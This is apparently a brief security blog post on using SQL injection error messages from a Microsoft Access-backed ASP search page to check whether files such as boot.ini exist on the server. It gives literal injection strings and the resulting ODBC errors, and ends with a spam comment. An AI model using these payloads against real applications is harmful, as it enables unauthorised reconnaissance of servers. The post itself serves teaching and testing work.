SQL Injection and Microsoft Access
An unauthenticated SQL Injection point in an application using a Microsoft Access database will probably not lead to sensitive information leakage. However, it is still possible to use the error messages from Access to verify if a specific file exists in the server file system or not:
Injection: ‘ union select 1 from blah in ‘\foo’ where 1=1 or ‘a’=’
Microsoft OLE DB Provider for ODBC Drivers error ‘80004005′
[Microsoft][ODBC Microsoft Access Driver] Could not find file ‘c:\foo’.
/search/sub_search.asp, line 209
Injection: ‘ union select 1 from blah in ‘\boot.ini’ where 1=1 or ‘a’=’
Microsoft OLE DB Provider for ODBC Drivers error ‘80004005′
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format ‘c:\boot.ini’.
/search/sub_search.asp, line 209
No related posts.
I do not even fully grasp how I stopped up proper here, even so I thought this put up was great. I do not recognize who you may be but undoubtedly you are going to a renowned blogger within the event you are not already. Cheers!